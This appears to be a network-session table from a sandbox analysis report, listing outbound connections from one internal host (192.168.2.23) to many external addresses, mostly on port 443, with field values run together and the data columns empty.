                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16372192.168.2.2337972106.19.240.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16373192.168.2.234144290.227.96.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16374192.168.2.235929482.249.47.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16375192.168.2.2348972181.225.231.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16376192.168.2.2350316196.247.167.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16377192.168.2.2345692155.138.241.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16378192.168.2.233641034.123.58.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16379192.168.2.234756097.168.125.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16380192.168.2.2352942109.201.40.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16381192.168.2.234438095.154.80.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16382192.168.2.2345848196.59.191.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16383192.168.2.2333018203.76.89.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16384192.168.2.235835434.117.191.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16385192.168.2.2351962121.182.201.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16386192.168.2.2352838168.75.91.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16387192.168.2.2348518143.175.166.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16388192.168.2.233785262.73.231.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16389192.168.2.2335230122.20.191.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16390192.168.2.2353488151.30.132.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16391192.168.2.233479634.20.192.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16392192.168.2.235562074.119.50.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16393192.168.2.234858239.251.169.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16394192.168.2.2344244121.22.161.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16395192.168.2.235773499.122.81.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16396192.168.2.2348954152.99.170.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16397192.168.2.233997887.94.113.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16398192.168.2.2335346173.173.231.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16399192.168.2.234607414.195.207.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16400192.168.2.2337820106.172.227.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16401192.168.2.2353418222.221.92.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16402192.168.2.235726241.117.9.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16403192.168.2.235432866.74.138.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16404192.168.2.234529669.159.142.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16405192.168.2.2339720223.42.174.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16406192.168.2.2348788223.236.236.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16407192.168.2.2342602108.168.120.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16408192.168.2.2360352174.221.114.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16409192.168.2.2349160186.250.88.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16410192.168.2.2337090190.17.109.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16411192.168.2.2332794169.247.102.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16412192.168.2.2355596149.162.166.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16413192.168.2.233636662.105.159.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16414192.168.2.236002012.217.9.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16415192.168.2.235712895.68.178.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16416192.168.2.2343062123.26.90.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16417192.168.2.234106443.240.185.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16418192.168.2.23530185.194.227.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16419192.168.2.23356089.189.76.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16420192.168.2.2345018202.153.190.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16421192.168.2.2356780192.198.222.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16422192.168.2.234294413.222.149.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16423192.168.2.2333438150.11.46.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16424192.168.2.234865665.120.121.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16425192.168.2.233327843.100.17.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16426192.168.2.2347368129.249.236.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16427192.168.2.2346288131.162.56.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16428192.168.2.2344242146.58.98.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16429192.168.2.2353556181.238.111.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16430192.168.2.233978262.56.127.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16431192.168.2.2358460149.153.196.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16432192.168.2.235907050.232.6.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16433192.168.2.235485461.232.146.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16434192.168.2.2336916131.250.205.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16435192.168.2.235043653.205.90.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16436192.168.2.235136694.216.81.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16437192.168.2.234784858.61.53.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16438192.168.2.235534613.172.33.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16439192.168.2.233650270.83.39.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16440192.168.2.2352694197.183.247.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16441192.168.2.2336130216.97.250.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16442192.168.2.2337984174.44.58.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16443192.168.2.2352326196.169.17.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16444192.168.2.2350860104.14.104.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16445192.168.2.2332866125.18.78.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16446192.168.2.234055495.27.157.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16447192.168.2.2338370100.60.113.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16448192.168.2.233471260.35.173.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16449192.168.2.235021631.37.254.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16450192.168.2.2338592139.101.17.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16451192.168.2.234193669.148.39.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16452192.168.2.2347436213.237.248.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16453192.168.2.2349736223.71.166.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16454192.168.2.2356008201.49.152.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16455192.168.2.2357014144.72.105.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16456192.168.2.2348234125.121.21.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16457192.168.2.235629076.2.229.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16458192.168.2.236019896.102.110.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16459192.168.2.2351232223.197.170.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16460192.168.2.2355944131.102.80.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16461192.168.2.2344742209.25.31.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16462192.168.2.2348794212.57.219.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16463192.168.2.2360522180.14.4.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16464192.168.2.2358388175.210.132.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16465192.168.2.234897479.250.176.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16466192.168.2.2340240156.16.128.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16467192.168.2.2342686165.112.55.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16468192.168.2.2341808202.100.18.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16469192.168.2.2335126117.73.125.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16470192.168.2.235972641.79.140.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16471192.168.2.233437841.5.87.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16472192.168.2.2347628160.15.249.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16473192.168.2.235509647.217.9.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16474192.168.2.235281699.193.98.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16475192.168.2.2359218111.13.40.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16476192.168.2.2344990114.247.14.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16477192.168.2.2340470219.123.141.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16478192.168.2.2332822121.29.108.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16479192.168.2.235555495.240.37.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16480192.168.2.234870290.187.54.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16481192.168.2.2348512136.72.144.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16482192.168.2.2334346108.9.100.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16483192.168.2.2340088153.177.214.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16484192.168.2.234481853.151.154.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16485192.168.2.233827445.180.99.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16486192.168.2.233788252.9.31.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16487192.168.2.2333200120.214.124.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16488192.168.2.233414488.71.109.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16489192.168.2.233445898.184.99.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16490192.168.2.2333530152.154.150.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16491192.168.2.23604382.17.120.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16492192.168.2.2339572183.14.109.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16493192.168.2.2344950106.94.47.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16494192.168.2.235413238.149.119.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16495192.168.2.235651299.195.187.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16496192.168.2.2352048130.203.102.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16497192.168.2.234318618.34.19.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16498192.168.2.233303635.227.225.888080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16499192.168.2.2352326189.108.241.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16500192.168.2.2345714188.66.112.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16501192.168.2.2354904128.165.137.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16502192.168.2.2350510222.25.132.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16503192.168.2.2338708121.0.18.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16504192.168.2.235701891.10.157.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16505192.168.2.233591890.130.101.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16506192.168.2.2355208194.192.119.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16507192.168.2.2354214139.249.184.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16508192.168.2.234255438.166.109.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16509192.168.2.2341814183.87.172.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16510192.168.2.235008099.195.101.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16511192.168.2.2351794119.53.120.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16512192.168.2.2336576115.63.145.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16513192.168.2.2334588222.109.164.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16514192.168.2.2357064158.39.239.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16515192.168.2.235539814.8.19.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16516192.168.2.2360830204.220.16.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16517192.168.2.235481452.210.94.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16518192.168.2.236048272.62.197.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16519192.168.2.235777469.94.51.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16520192.168.2.235393473.201.25.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16521192.168.2.2353196125.3.229.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16522192.168.2.2342982119.48.78.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16523192.168.2.2339346110.59.109.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16524192.168.2.2333376223.240.255.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16525192.168.2.233642863.128.164.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16526192.168.2.2336276204.25.4.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16527192.168.2.2360564162.195.91.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16528192.168.2.234159099.154.122.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16529192.168.2.2359060197.72.213.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16530192.168.2.2348066132.198.173.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16531192.168.2.2358514180.4.21.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16532192.168.2.233379042.57.113.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16533192.168.2.2337680117.14.249.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16534192.168.2.2334110187.50.226.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16535192.168.2.2346498179.88.52.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16536192.168.2.2340282206.29.128.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16537192.168.2.234442839.8.166.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16538192.168.2.2338646193.218.154.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16539192.168.2.235821681.86.34.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16540192.168.2.2347892176.182.90.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16541192.168.2.235783467.115.122.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16542192.168.2.2339880118.1.159.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16543192.168.2.234165675.193.92.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16544192.168.2.2338520190.187.95.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16545192.168.2.2359236212.47.244.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16546192.168.2.2356258198.88.111.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16547192.168.2.235630827.114.26.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16548192.168.2.2356132145.12.126.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16549192.168.2.2338284134.195.91.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16550192.168.2.235082460.244.43.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16551192.168.2.2357448162.14.183.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16552192.168.2.2341934148.105.207.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16553192.168.2.235293464.8.250.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16554192.168.2.234707275.158.17.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16555192.168.2.2357304149.147.101.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16556192.168.2.2341816119.221.180.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16557192.168.2.2333220204.211.95.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16558192.168.2.2355930158.74.165.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16559192.168.2.2355614100.49.204.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16560192.168.2.2339890170.137.88.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16561192.168.2.2335772129.188.0.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16562192.168.2.2339716102.186.45.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16563192.168.2.2353850117.245.33.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16564192.168.2.2340732196.146.93.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16565192.168.2.234635053.71.247.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16566192.168.2.2354512100.218.254.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16567192.168.2.2352272108.141.50.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16568192.168.2.2342288135.105.52.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16569192.168.2.2341888151.55.190.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16570192.168.2.2360148180.78.234.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16571192.168.2.2339170146.55.167.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16572192.168.2.235867457.130.71.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16573192.168.2.234076689.103.145.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16574192.168.2.235926269.211.119.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16575192.168.2.235391269.150.143.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16576192.168.2.2336670220.168.243.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16577192.168.2.2357088136.204.193.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16578192.168.2.2353288188.80.120.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16579192.168.2.2341434161.33.161.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16580192.168.2.234671286.221.34.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16581192.168.2.2358522120.207.102.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16582192.168.2.233759842.104.142.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16583192.168.2.234887819.247.55.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16584192.168.2.2359692209.207.138.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16585192.168.2.2358894195.251.223.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16586192.168.2.2350236216.31.193.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16587192.168.2.2334882187.16.154.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16588192.168.2.235895681.229.248.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16589192.168.2.2353654119.136.126.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16590192.168.2.23426201.4.102.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16591192.168.2.2346028117.10.187.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16592192.168.2.234623044.177.57.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16593192.168.2.2355706180.252.83.163443
